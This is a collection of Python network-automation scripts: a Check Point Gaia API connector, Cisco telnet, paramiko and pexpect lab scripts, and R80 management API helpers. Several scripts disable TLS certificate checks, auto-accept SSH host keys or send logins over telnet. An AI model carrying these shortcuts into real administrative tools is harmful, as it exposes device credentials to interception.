TAB_WIDTH = int(arguments.tab)
except ValueError:
LOG.critical("Argument 'tab' is not valid, please have a check")
quit_application(-1)
else:
LOG.critical("Argument 'tab' is not valid, please have a check")
quit_application(-1)
def quit_application(state):
if state == -1:
LOG.info("{application} exited abnormally".format(application = __application__))
else:
LOG.info("{application} exited normally".format(application = __application__))
sys.exit(state)
def parse_arguments(arguments):
arg_parser = argparse.ArgumentParser(description = "resource detector: detect g11n/i18n issues in resource files")
arg_parser.add_argument("directory", help = "specify the source code directory to be scanned")
arg_parser.add_argument("-o", "--output", metavar = "result.txt", help = "specify the output file where detection result will be written")
arg_parser.add_argument("-g", "--generate_config", action = "store_true", help = "generate configuration file named 'resource_detector_config.py' in the directory to be scanned")
arg_parser.add_argument("-l", "--log", metavar = "log.txt", help = "specify the log file")
arg_parser.add_argument("-t", "--tab", metavar = "4", help = "specify the tab width to make sure the column number is correctly calculated, default value is 4")
arg_parser.add_argument("-i", "--ignore_pattern", metavar = "ignore_patterns.txt", help = "specify the file where ignore issue patterns will be written")
arg_parser.add_argument("-s", "--summary", metavar = "summary.csv", help = "specify the csv file where summary detection result will be written")
arg_parser.add_argument("-d", "--details", metavar = "details.csv", help = "specify the csv file where detailed detection result will be written")
arg_parser.add_argument("-v", "--version", action = "version", version = __version__)
return arg_parser.parse_args(arguments)
def main(argv):
arguments = parse_arguments(argv[1:])
initialize(arguments)
resource_detector = ResourceDetector(arguments)
resource_detector.run()
return 0
if __name__ == "__main__":
result = main(sys.argv)
quit_application(result)
``` |
{
"source": "0dadj1an/Check_Point_Gaia_API_config_generator",
"score": 2
} |
#### File: 0dadj1an/Check_Point_Gaia_API_config_generator/gaia_api_connector.py
```python
__author__ = "<NAME>"
__credits__ = ["ivosh", "laura"]
__version__ = "1.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "production"
__dev_version__ = "v1"
__spec__= "GaiaAPI connector"
import requests
import urllib3
import json
import sys
import time
import getpass
import logging
import os
import base64
import ipaddress
import signal
import argparse
from datetime import datetime
######## Class############
class DoLogging():
"""
Logging class, to have some possibility debug code in the future
"""
def __init__(self) -> None:
"""
Constructor does not do anything
"""
pass
def do_logging(self:object, msg:str) -> None:
"""
Log appropriate message into log file
"""
# if needed change to DEBUG for more data
current_path=(os.path.dirname(os.path.abspath(__file__)))
log='{0}/gaia_api_connector.elg'.format(current_path)
logging.basicConfig(filename=log, level=logging.DEBUG)
msgq = 'TIME:{}:{}'.format(str(datetime.now()),msg)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
logging.info(msgq)
logging.info(requests_log)
######## Class############
class Connector():
"""
Connector class is main class handling connectivity to CP API
"""
# do not care about ssl cert validation for now
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@classmethod
def task_method(cls, sid:str, url:str, task:str) -> dict:
"""
this is help method which is checking task status when publish is needed
"""
payload_list={}
payload_list['task-id']=task
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-task", json=payload_list, headers=headers, verify=False)
return response
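    # The show-task reply is consumed below roughly as
    #   {"tasks": [{"task-id": ..., "progress-percentage": ..., "task-details": [...]}]}
    # (a sketch inferred from how run_script() reads it, not from the API reference).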
def __init__(self, url:str, payload:dict) -> dict:
"""
This is constructor for class, login to API server is handled here - handling also conectivity problems to API
"""
self.sid=""
# default header without SID
self.headers_default = {
'content-type': "application/json",
'Accept': "*/*",
}
# headers for usage in instance methods - with self.SID - will be filled up in constructor
self.headers = {}
self.url=url
self.payload_list = payload # default only username and passowrd
done=False
counter=0
# loop to handle connection interuption
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging ('Connector() - init() - connection to API can not be established even in loop, check your credentials or IP connectivity')
sys.exit(1)
try:
self.response = requests.post(self.url+"login", json=self.payload_list, headers=self.headers_default, verify=False)
DoLogging().do_logging('Connector() - init() - login OK: {}'.format(self.url))
DoLogging().do_logging('Connector() - init() - login data: {}'.format(self.response.text))
if self.response.status_code == 200:
#print(json.loads(self.response.text))
try:
sid_out=json.loads(self.response.text)
self.sid = sid_out['sid']
self.headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': self.sid,
}
DoLogging().do_logging('Connector() - init() - Connection to API is okay')
except Exception as e:
DoLogging().do_logging(' Connector() - init() - API is not running probably: {}..'.format(e))
else:
a = json.loads(self.response.text)
DoLogging().do_logging("Connector() - init() - Exception occured: {}".format(a))
DoLogging().do_logging('Connector() - init() - There is no SID, connection problem to API gateway, trying again..')
time.sleep (1)
continue
except Exception as e:
DoLogging().do_logging(' Connector() - init() - exception occured..can not connect to mgmt server, check IP connectivity or ssl certificates!!! : {}'.format(e))
else:
done=True
def logout(self) -> None:
"""
Logout method for correct disconenction from API
"""
done=False
counter=0
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging('Connector() - logout() - logout can not be done because connection to mgmt is lost and reconnect does not work...')
sys.exit(1)
else:
try:
payload_list={}
self.response = requests.post(self.url+"logout", json=payload_list, headers=self.headers, verify=False)
if self.response.status_code == 200:
DoLogging().do_logging ('Connector() - logout() - logout from API is okay')
return self.response.json()
else:
out = json.loads(self.response.text)
DoLogging().do_logging (" ")
DoLogging().do_logging(out)
DoLogging().do_logging (" ")
return self.response.json()
except Exception as e:
DoLogging().do_logging ('Connector() - logout() - connection to gateway is broken, trying again: {}'.format(e))
@staticmethod
def base64_ascii(base64resp:str) -> str:
"""Converts base64 to ascii for run command/showtask."""
try:
return base64.b64decode(base64resp).decode('utf-8')
except Exception as e:
DoLogging().do_logging("base64 error:{}".format(e))
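    # e.g. base64_ascii("aGVsbG8=") returns "hello"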
def run_script(self, payload:dict) -> str:
"""
run script method is responsible for running script on target (ls -la, df -lh etc. basic linux commands)
"""
payload_list=payload
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': self.sid,
}
return_string = ''
done=False
counter=0
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging('Connector() - run_script() - discard can not be done because connection to mgmt is lost and reconnect does not work...')
sys.exit(1)
else:
try:
self.response = requests.post(self.url+"run-script", json=payload_list, headers=headers, verify=False)
task=json.loads(self.response.text)
while True:
show_task=Connector.task_method(self.sid,self.url,task['task-id'])
show_task_text=json.loads(show_task.text)
#DoLogging().do_logging ("Connector() - run_script() - :{}".format(show_task_text))
time.sleep (5)
if show_task_text['tasks'][0]['progress-percentage'] == 100:
base64resp = (str(self.send_cmd('show-task', payload={"task-id":show_task_text['tasks'][0]['task-id']})['tasks'][0]['task-details'][0]['output']))
asciiresp = self.base64_ascii(base64resp)
return_string=return_string+"\n\n"+"Data for target:"+"\n"+asciiresp+"\n\n\n\n\n\n"
#DoLogging().do_logging ("Connector() - run_script() - :{}".format(show_task_text))
break
else:
continue
return return_string
except Exception as e:
                    DoLogging().do_logging ("Connector() - run_script() - Exception in run_script method, some data not returned, continue: {}".format(e))
else:
done=True
def send_cmd(self, cmd:str, payload:dict) -> dict:
"""
Core method, all data are exchanged via this method via cmd variable, you can show, add data etc.
"""
done=False
counter=0
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging ("Connector() - send_cmd() - Can not send API cmd in loop, there are some problems, changes are unpublished, check it manually..")
self.logout()
sys.exit(1)
else:
try:
payload_list=payload
self.response = requests.post(self.url + cmd, json=payload_list, headers=self.headers, verify=False)
if self.response.status_code == 200:
#uncomment for TSHOOT purposes
DoLogging().do_logging ('Connector() - send_cmd() - send cmd is okay')
#out = json.loads(self.response.text)
#DoLogging().do_logging ('Connector() - send_cmd() - send cmd response is 200 :{}'.format(out))
return self.response.json()
else:
out = json.loads(self.response.text)
DoLogging().do_logging(" Connector() - send_cmd() - response code is not 200 :{}".format(out))
return self.response.json()
except Exception as e:
DoLogging().do_logging ("Connector() - send_cmd() - POST operation to API is broken due connectivity flap or issue.. trying again..: {}".format(e))
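    # Illustrative use, reusing a call from the sample json shown further below:
    #   connector.send_cmd("add-vlan-interface",
    #                      {"parent": "eth1", "id": 11, "ipv4-address": "10.10.20.2", "ipv4-mask-length": 24})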
######## Class############
class Interactive_Init_Handler():
"""
Init class for getting basic data about user/pwd/GW IP and establishing connector for API
"""
def __init__(self) -> None:
self.user=''
self.password=''
self.IP=''
self.node1IP=''
self.node2IP=''
self.connector=None
self.connectors=[]
self.version=''
self.data = None
self.path=''
@staticmethod
def validate_ip(ip:str) -> bool:
"""
validate ip format to avoid adding crazy data for IP based variable
"""
check = True
try:
data = ip.split(":")
ip = ipaddress.ip_address(data[0])
return check
except Exception as e:
check= False
print ("IP validation failed for some reason!: {}".format(e))
return check
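    # e.g. validate_ip("10.1.1.1") and validate_ip("10.1.1.1:443") both return True,
    # since anything after the first ":" is dropped before validation.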
def _single(self, singleIP=None)-> None:
"""
establishing single connector to appropriate gateways via special class Connector() object
depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not
"""
try:
if singleIP == None:
self.IP=input("Enter GW IP: ")
else:
self.IP = singleIP
if not self.user or not self.password or not self.IP:
print ("Empty username or password or server IP, finish..")
sys.exit(1)
else:
if self.validate_ip(self.IP):
                    payload ={
                        "user":self.user,
                        "password":self.password
}
try:
connector = Connector('https://{}/gaia_api/'.format(self.IP), payload)
self.connector = connector
except Exception as e:
                        print ("Can not establish connector, check gaia_api_connector.elg : {}".format(e))
else:
print ("Wrong IP for single GW, exit")
raise Exception ("Wrong IP for single GW, exit")
except Exception as e:
raise Exception ("Error in Interactive_Init_Handler()._single() method")
print ("Connector to single gw is established")
def _cluster (self, nodeIP1=None, nodeIP2=None) -> None:
"""
establishing cluster connectors to appropriate gateways via special class Connector() object
depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not
"""
try:
if nodeIP1 == None and nodeIP2 == None:
self.node1IP=input("Enter node1 IP: ")
self.node2IP=input("Enter node2 IP: ")
else:
self.node1IP = nodeIP1
self.node2IP = nodeIP2
if not self.user or not self.password or not self.node1IP or not self.node2IP:
print ("Empty username or password or server IP, finish..")
sys.exit(1)
else:
if self.validate_ip(self.node1IP):
                    payload ={
                        "user":self.user,
                        "password":self.password
}
try:
connector = Connector('https://{}/gaia_api/'.format(self.node1IP), payload)
self.connectors.append(connector)
except Exception as e:
                        print ("Can not establish connector, check gaia_api_connector.elg : {}".format(e))
if self.validate_ip(self.node2IP):
payload ={
"user":self.user,
"password":self.password
}
try:
connector = Connector('https://{}/gaia_api/'.format(self.node2IP), payload)
self.connectors.append(connector)
except Exception as e:
                            print ("Can not establish connector, check gaia_api_connector.elg : {}".format(e))
else:
                        print ("Wrong IP for cluster node, exit")
                        raise Exception ("Wrong IP for cluster node, exit")
except Exception as e:
raise Exception ("Error in Interactive_Init_Handler()._cluster() method")
print ("Connectors to cluster established")
def _load_data(self, path=None)-> dict:
"""
load json data via separate object via class Load_Data()
depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not
"""
try:
if path == None:
# interactive mode
path=input("Where is your json file with data for vlan manipulation?\n If no path specified, I count file data.json is in same folder as script\n")
if not path:
data = Load_Data()
return data.load_data()
else:
data = Load_Data(path)
return data.load_data()
else:
# mode with args
data = Load_Data(path)
return data.load_data()
except Exception as e:
raise Exception
def run(self) -> None:
"""
handle user input at the beginning // handle argparse parameters - depends on the format
"""
try:
argParser = argparse.ArgumentParser(description='_Script for Gaia API modification_')
argParser.add_argument("-s", dest="single", help=('specify single GW IP'), required=False)
argParser.add_argument("-jh", dest="jh", help=('display json format help'), required=False)
            argParser.add_argument("-n1", dest="node1", help=('specify cluster node1 IP'), required=False)
            argParser.add_argument("-n2", dest="node2", help=('specify cluster node2 IP'), required=False)
            argParser.add_argument("-u", dest="user", help=('specify user name'), required=False)
            #argParser.add_argument("-p", dest="password", help=('specify password'), required=False)
            argParser.add_argument("-v", dest="version", help=('specify version to run [cluster/single]'), required=False)
            argParser.add_argument("-d", dest="path", help=('specify path to json data, default is the same directory'), required=False)
args = argParser.parse_args()
if args.jh == "TRUE":
print (Error_Msg().display())
sys.exit(1)
# check if args are filled up, if not do interactive mode
if args.user == None and args.version == None and args.path == None:
                print("###############################",
                "Check Point GAiA API connector, interactive mode for Gaia OS modification via API",
                "",
                "XXXXXXXXXX Training version for ihr XXXXXXXXXXXX",
                "There is a log file: gaia_api_connector.elg in the same folder as this script, check it if something goes wrong ",
"",
"This script takes json data [keys node1,node2,single in XXX.json are mandatory!] -> respect general GAiA API calls -> for other keys and payloads for that call consult gaia API reference",
"",
"!!!!! IF you do not want to use interactive mode, just hit ctrl+c and run python gaia_api_connector.py -h !!!!",
"",
"If you want to see supported json format, run gaia_api_connector.py -jh TRUE ",
"",
"###############################",
sep="\n")
self.user=input("Enter API/GUI user name with write permissions: ")
self.password=getpass.getpass()
self.version=input("Is this single GW or Cluster?\n Type: [single] for single GW or [cluster] for cluster GW:")
if self.version == "single":
try:
self.version='single'
self._single()
self.data = self._load_data()
print ("")
print ("#########################################")
print ("Running on single node: {}".format(self.IP))
try:
Operate_CP(self.data['single'],self.connector).run()
except Exception as e:
raise Exception("json data issue, single, interactive..")
print ("#########################################")
print ("")
except Exception as e:
print ("issue when calling single gw from interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress in progress")
elif self.version == "cluster":
try:
self.version='cluster'
self._cluster()
self.data = self._load_data()
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.node1IP))
try:
Operate_CP(self.data['node1'],self.connectors[0]).run()
except Exception as e:
raise Exception("json data issue, cluster, interactive..")
print ("#########################################")
print ("")
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.node2IP))
try:
Operate_CP(self.data['node2'], self.connectors[1]).run()
except Exception as e:
raise Exception("json data issue, cluster, interactive..")
print ("#########################################")
print ("")
except Exception as e:
print ("issue when calling cluster from interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress")
else:
print ("")
print ("")
print ("You were asked for something, your input was wrong, now you have to start again :P\n Press ctrl+c for exit")
print ("")
print ("")
self.run()
# non interactive mode here
else:
if args.user == None or args.version == None or args.path == None :
                    print ("missing arguments, run -h option")
else:
self.user = args.user
self.password = <PASSWORD>()
self.version = args.version
self.path = args.path
if self.version == "single":
if args.single == None:
                            print ("missing or wrong arguments, run -h option")
else:
try:
self.IP = args.single
self._single(self.IP)
self.data = self._load_data(self.path)
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.IP))
try:
Operate_CP(self.data['single'],self.connector).run()
except Exception as e:
raise Exception ("json data issue, single, non-interactive..")
print ("#########################################")
print ("")
except Exception as e:
print ("issue when calling single gw from non-interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress")
else:
if args.node1 == None and args.node2 == None:
                            print ("missing or wrong arguments, run -h option")
else:
try:
self.node1IP = args.node1
self.node2IP = args.node2
self._cluster(self.node1IP, self.node2IP)
self.data = self._load_data(self.path)
try:
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.node1IP))
Operate_CP(self.data['node1'],self.connectors[0]).run()
print ("#########################################")
print ("")
print ("")
print ("##########################################")
print ("Running on node: {}".format(self.node2IP))
Operate_CP(self.data['node2'], self.connectors[1]).run()
print ("#########################################")
print ("")
except Exception as e:
raise Exception ("json data issue, cluster, non-interactive..")
except Exception as e:
print ("issue when calling cluster from non-interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress")
except KeyboardInterrupt:
print ("\n ctrl+c pressed, exit..")
# if there is no connector just leave
try:
self.connector.logout()
sys.exit(1)
except:
try:
for item in self.connectors:
item.logout()
sys.exit(1)
except:
sys.exit(1)
except Exception as e:
print ("\n Interactive_Init_Handler().run() error: {}".format(e))
# if there is no connector just leave
try:
self.connector.logout()
sys.exit(1)
except:
try:
for item in self.connectors:
item.logout()
sys.exit(1)
except:
sys.exit(1)
######## Class############
class Operate_CP():
"""
data are extracted here and send against Gaia API
"""
def __init__(self, data:list, connector:object) -> None:
self.data = data
self.connector = connector
def run(self):
try:
check_msg02_sent = False # check if special error msg has been displayed
for cmd in self.data: # every item in self.data is like a call with payload
keys = list(cmd.keys()) # I need keys since I do not know what is there - key is api call
i=0 # aka first key in keys list
for item in keys:
try:
if i > 0: # if there is more keys in dict, finsh, this is unsupported format for this script
raise Exception ("Unsupported json format for this script")
except Exception as e:
print ("Operate_CP().run() issue: {}!! \n {}".format(e, Error_Msg().display2()))
check_msg02_sent = True # msg has been send, set check
raise Exception ("Unsupported json format for this script")
else:
print ("#####################################")
print ("running API call:{}".format(keys[i]))
if keys[i] =="run-script":
#run script has special method because output is encoded in base64 format
for item in cmd[keys[i]]:# for every item in apicall -> {"apicall": [{payload}, payload]} -> run the payload against API
print ("")
print ("payload:\n {}".format(item))
print ("result: {}".format(self.connector.run_script(item)))
print ("")
else:
for item in cmd[keys[i]]:# for every item in apicall -> {"apicall": [{payload}, payload]} -> run the payload against API
print ("")
print ("payload:\n {}".format(item))
print ("result: {}".format(json.dumps(self.connector.send_cmd(keys[i],item), indent=4, sort_keys=True)))
print ("")
print ("#######################################")
i+=1
except Exception as e:
if check_msg02_sent == False:
print ("Operate_CP().run() issue: Follow right json data format for this script!! \n {}".format(Error_Msg().display()))
raise Exception ("Unsupported json format for this script")
######## Class############
class Error_Msg():
def __init__(self) -> None:
pass
def display2(self):
return ("""Make sure you have right format:\n
You defined just one item in node1 list and rest as part of dict -->\n
[{"cmd1":[{payload_data01}, {payload-data02}], "cmd2":[{payload_data01}, {payload-data02}]}]
this format is not supported... \n
    be really careful, you can overwrite your data (eth1.11 overwritten by eth1.20) if you do something like this, since a duplicate key in a python dict silently replaces the earlier one:\n
"node1": [
{"delete-vlan-interface":[
{"name":"eth1.11"},
{"name":"eth1.12"},
{"name":"eth1.13"},
{"name":"eth1.14"}],
"add-vlan-interface":[
{"parent":"eth1","id":11, "ipv4-address":"10.10.20.2", "ipv4-mask-length":24},
{"parent":"eth1","id":12, "ipv4-address":"10.10.30.2", "ipv4-mask-length":24},
{"parent":"eth1","id":13, "ipv4-address":"10.10.40.2", "ipv4-mask-length":24},
{"parent":"eth1","id":14, "ipv4-address":"10.10.50.2", "ipv4-mask-length":24}],
"delete-vlan-interface":[
{"name":"eth1.20"},
{"name":"eth1.12"},
{"name":"eth1.13"},
{"name":"eth1.14"}]
}
],
"node2":[
{XXX}
]
"single":[
{XXX}
]
}
""")
def display(self):
return (""" Make sure you have right format:\n
Keys node1, node2, single are mandatory!\n
define as dedicated item in node1[] list -->\n
[{"apiCall":[{payload_data01}, {payload-data02}]},{"apiCall":[{payload_data01}, {payload-data02}]}]
prefered format!!!
{
"node1": [
{"add-vlan-interface":[
{"parent":"eth1","id":11, "ipv4-address":"10.10.20.2", "ipv4-mask-length":24},
{"parent":"eth1","id":12, "ipv4-address":"10.10.30.2", "ipv4-mask-length":24},
{"parent":"eth1","id":13, "ipv4-address":"10.10.40.2", "ipv4-mask-length":24},
{"parent":"eth1","id":14, "ipv4-address":"10.10.50.2", "ipv4-mask-length":24}]},
{"add-vlan-interface":[
{"parent":"eth1","id":11, "ipv4-address":"10.10.20.2", "ipv4-mask-length":24},
{"parent":"eth1","id":12, "ipv4-address":"10.10.30.2", "ipv4-mask-length":24},
{"parent":"eth1","id":13, "ipv4-address":"10.10.40.2", "ipv4-mask-length":24},
{"parent":"eth1","id":14, "ipv4-address":"10.10.50.2", "ipv4-mask-length":24}]}
],
"node2": [
{XXX},
{XXX}
],
"single":[
{XXX},
{XXX}
]
}
if you are using cluster, define node1 and node2, but leave single in json file as follow:
"single":[]
same for case you are running via single, just leave node1, node2 lists empty but keep the keys!!!
""")
######## Class############
class Load_Data():
def __init__(self, path='data.json') -> None:
self.path = path
def _validate_data(self, data) -> bool:
try:
if 'node1' in data and 'node2' in data and 'single' in data:
return True
except Exception as e:
print ("There is wrong data format: {} gateway".format(e))
return False
def load_data(self) -> dict:
try:
with open(self.path) as f:
data = json.load(f)
if self._validate_data(data):
if data == None:
raise Exception(Error_Msg().display())
else:
return data
else:
raise Exception(Error_Msg().display())
except Exception as e:
print ("Can not load data, make sure path to data.json is right or json is in same folder as script, make sure your format is right: {}".format(e))
print(Error_Msg().display())
######## Class############
def handler(signum, frame):
"""
just handling if someone press ctrl+z
"""
print ("Ctrl+Z pressed, but ignored")
def main():
"""
main method where all starts
enjoy! ihr..
"""
try:
current_path=(os.path.dirname(os.path.abspath(__file__)))
log='{0}/gaia_api_connector.elg'.format(current_path)
os.remove(log)
except Exception as e:
pass
signal.signal(signal.SIGTSTP, handler)
run = Interactive_Init_Handler()
run.run()
if __name__ == "__main__":
main()
``` |
{
"source": "0dadj1an/mix",
"score": 3
} |
#### File: KirkB-Automation/namespaces/namespaces.py
```python
x=10
y=20
z=30
def namespace01():
def namespace02():
x=0.5
print x
print y
print z
x=1
y=2
print x
print y
print z
namespace02()
namespace01()
print x
print y
print z
```
#### File: KirkB-Automation/paramiko_netmiko/ConnectDevice02.py
```python
import telnetlib
import time
import socket
import sys
TIMEOUT = 6
TELNET_PORT = 23
class ConnectDevice02(object):
def __init__(self, ip, username, password):
self.ip = ip
self.username = username
self.password = password
try:
self.connection = telnetlib.Telnet(self.ip, TELNET_PORT, TIMEOUT)
except socket.timeout:
sys.exit("Unable to connect due timeout")
self.telnetLogin()
def telnetSend(self, command):
command = command.rstrip()
self.connection.write(command + '\n')
time.sleep(1)
return self.connection.read_very_eager()
def telnetLogin(self):
output = self.connection.read_until("sername:", TIMEOUT)
self.connection.write(self.username +'\n')
output = output + self.connection.read_until("ssword:", TIMEOUT)
self.connection.write(self.password +'\n')
return output
    def telnetClose(self):
self.connection.close()
def main():
ip_add = raw_input("write IP" + '\n')
username = raw_input("write username" + '\n')
password = raw_input("write password" + '\n')
new_connection = ConnectDevice02(ip_add, username, password)
new_connection.telnetSend('terminal length 0')
new_connection.telnetSend('show version')
new_connection.telnetClose()
```
#### File: python_bundle_1_2/mgmt_api_lib/api_exceptions.py
```python
class APIException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return str(self.value)
class APIClientException(APIException):
pass
``` |
{
"source": "0dadj1an/pynet",
"score": 3
} |
#### File: pynet/ciscoconfparse/confparse.py
```python
import re
from ciscoconfparse import CiscoConfParse
parse = CiscoConfParse("/home/hrb/github/pynet/ciscoconfparse/config.txt")
objects = parse.find_objects("^crypto map CRYPTO")
objects2 = parse.find_objects_wo_child(parentspec=r"crypto map CRYPTO", childspec=r"AES")
def findParentAndChildren():
for obj in objects:
print "Parent is:"
print obj.text
print""
parent = objects[objects.index(obj)]
list_a= parent.children
        print "Children are:"
for child in list_a:
print child.text
print""
def findPFSgroup2():
print "#################"
print "CRYPTO maps with PFSgroup2 are:\n"
for obj in objects:
if obj.re_search_children(r"set pfs group2"):
print obj.text
print""
def findNOTAES():
print "#################"
print "CRYPTO maps with NO AES:\n"
for obj in objects2:
for child in obj.children:
if 'transform' in child.text:
pattern = re.search(r"set transform-set (.*)$", child.text)
transform_set = pattern.group(1)
print "{0} and transform set is: {1}".format(obj.text, transform_set)
def main():
    findParentAndChildren()
findPFSgroup2()
findNOTAES()
if __name__ == '__main__':
main()
```
#### File: pynet/paramiko_netmiko/class4ex_paramiko.py
```python
import time
import paramiko
from getpass import getpass
def disablePaging(connection):
    '''disable paging by entering terminal length'''
connection.send("terminal length 0\n")
time.sleep(1)
output = connection.recv(1000)
return output
def showVersion(connection):
''' method for showing the version '''
connection.send("show version\n")
time.sleep(1)
output = connection.recv(5000)
return output
def enterConfig(connection):
'''congig mode method '''
connection.send("conf t\n")
time.sleep(1)
output = connection.recv(5000)
return output
def loginBuffered(connection):
    ''' changing logging buffer '''
connection.send("loggin buffered 65000\n")
time.sleep(1)
output = connection.recv(5000)
return output
def showRun(connection):
''' show run '''
connection.send("show run\n")
time.sleep(1)
output = connection.recv(5000)
return output
def exitFromConf(connection):
''' exit from conf t mode '''
connection.send("exit\n")
time.sleep(1)
output = connection.recv(5000)
return output
def main():
ip = '172.16.17.32'
username = 'pyclass'
    password = getpass()
remote_conn=paramiko.SSHClient()
# avoid issues with not trusted targets
remote_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
remote_conn.connect(ip, username=username, password=password, look_for_keys=False, allow_agent=False)
#invoke shell means you can send commands more times
remote_conn02 = remote_conn.invoke_shell()
disablePaging(remote_conn02)
enterConfig(remote_conn02)
loginBuffered(remote_conn02)
exitFromConf(remote_conn02)
output = showRun(remote_conn02)
print output
if __name__ == "__main__":
main()
```
#### File: pynet/paramiko_netmiko/pexpect_test.py
```python
import pexpect
import sys
import time
def main():
ip = '192.168.3.11'
username = 'pyclass'
password = ''
port = 8022
    # ssh -l expects the host after the user; pass the ip, not the password
    remote_conn = pexpect.spawn('ssh -l {} {} -p {}'.format(username, ip, port))
remote_conn.timeout = 3
remote_conn.expect('ssword:')
remote_conn.sendline(password)
remote_conn.expect('#')
remote_conn.sendline('show ip int brief')
remote_conn.expect('#')
remote_conn.sendline('conf t')
remote_conn.expect('#')
remote_conn.sendline('loggin buffered 65000')
remote_conn.expect('#')
remote_conn.sendline('exit')
remote_conn.expect('#')
remote_conn.sendline('show run')
remote_conn.expect('#')
print remote_conn.before
if __name__ == "__main__":
main()
```
#### File: pynet/telnetlib/exercise_2_and_3.py
```python
import telnetlib
import time
import socket
import sys
class ConnectDevice02(object):
def __init__(self, ip, username, password):
self.ip = ip
self.username = username
self.password = password
self.timeout = 6
self.port =23
try:
self.connection = telnetlib.Telnet(self.ip, self.port, self.timeout)
except socket.timeout:
sys.exit("Unable to connect due timeout")
self.telnetLogin()
self.telnetSend("terminal length 0")
def telnetSend(self, command):
command = command.rstrip()
self.connection.write(command + '\n')
time.sleep(1)
return self.connection.read_very_eager()
def telnetLogin(self):
output = self.connection.read_until("sername:", self.timeout)
if output:
self.connection.write(self.username +'\n')
else:
print "Not possible to add username"
output = output + self.connection.read_until("ssword:", self.timeout)
if output:
self.connection.write(self.password +'\n')
else:
print "Not possible to add username"
#print output
def telnetClose(self):
self.connection.close()
def main():
ip_add = raw_input("write IP" + '\n')
username = raw_input("write username" + '\n')
password = raw_input("write password" + '\n')
command = raw_input("enter command to be executed" + '\n')
new_connection = ConnectDevice02(ip_add, username, password)
output = new_connection.telnetSend("terminal length 0")
output = new_connection.telnetSend(command)
print output
new_connection.telnetClose()
if __name__ == "__main__":
main()
``` |
{
"source": "0dadj1an/r80python",
"score": 3
} |
#### File: 0dadj1an/r80python/r80_apis.py
```python
import requests
import json
import pprint
#remove https warning
requests.packages.urllib3.disable_warnings()
#url = "https://192.168.248.150/web_api/"
#user = "api_user"
#pw = "<PASSWORD>"
def login(url,user,pw):
payload_list={}
payload_list['user']=user
payload_list['password']=pw
headers = {
'content-type': "application/json",
'Accept': "*/*",
}
response = requests.post(url+"login", json=payload_list, headers=headers, verify=False)
return response
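# Note: login() returns the raw requests.Response; the session id expected by the
# other helpers has to be taken from its JSON body first, e.g. (illustrative):
#   sid = login(url, user, pw).json()["sid"]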
def add_host(sid,url,name,ip_address,groups="",comments="",nat_settings=""):
payload_list={}
payload_list['name']=name
payload_list['ipv4-address']= ip_address
if nat_settings != "":
payload_list['nat-settings']= nat_settings
if groups != "" :
payload_list['groups']= groups
if comments != "":
payload_list['comments']= comments
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
print payload_list
response = requests.post(url+"add-host", json=payload_list, headers=headers, verify=False)
return response.json()
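# Illustrative call (object name, address and group are made-up values):
#   add_host(sid, url, "web-srv-01", "10.1.1.10", groups=["my_group"], comments="added via API")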
def delete_host(sid,url,name):
payload_list={}
payload_list['name']=name
payload_list['ignore-warnings']="true"
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-host", json=payload_list, headers=headers, verify=False)
return response
def add_network(sid,url,name,subnet,mask_length,nat_settings,groups):
payload_list={}
payload_list['name']=name
payload_list['subnet4']= subnet
payload_list['mask-length']= mask_length
payload_list['nat-settings']= nat_settings
payload_list['groups']= groups
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-network", json=payload_list, headers=headers, verify=False)
return response.json()
def delete_network(sid,url,name):
payload_list={}
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-network", json=payload_list, headers=headers, verify=False)
return response
def show_network_groups(sid,url):
payload_list={}
payload_list['details-level']="standard"
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-groups", json=payload_list, headers=headers, verify=False)
groups=json.loads(response.text)
return groups
def add_network_group(sid,url,name):
payload_list={}
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-group", json=payload_list, headers=headers, verify=False)
return response
def add_members_to_network_group(sid,url,name,members):
payload_list={}
payload_list['name']=name
payload_list['members']=members
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"set-group", json=payload_list, headers=headers, verify=False)
return response
def add_access_layer(sid,url,name):
payload_list={}
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-access-layer", json=payload_list, headers=headers, verify=False)
return response
def add_policy_package(sid,url,name,access_layer,threat_layer,comments):
payload_list={}
payload_list['name']=name
payload_list['access']=access_layer
payload_list['threat-prevention']=threat_layer
payload_list['comments']=comments
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-package", json=payload_list, headers=headers, verify=False)
return response
def add_access_section(sid,url,layer,position,name):
payload_list={}
payload_list['layer']=layer
payload_list['position']=position
payload_list['name']=name
headers = {
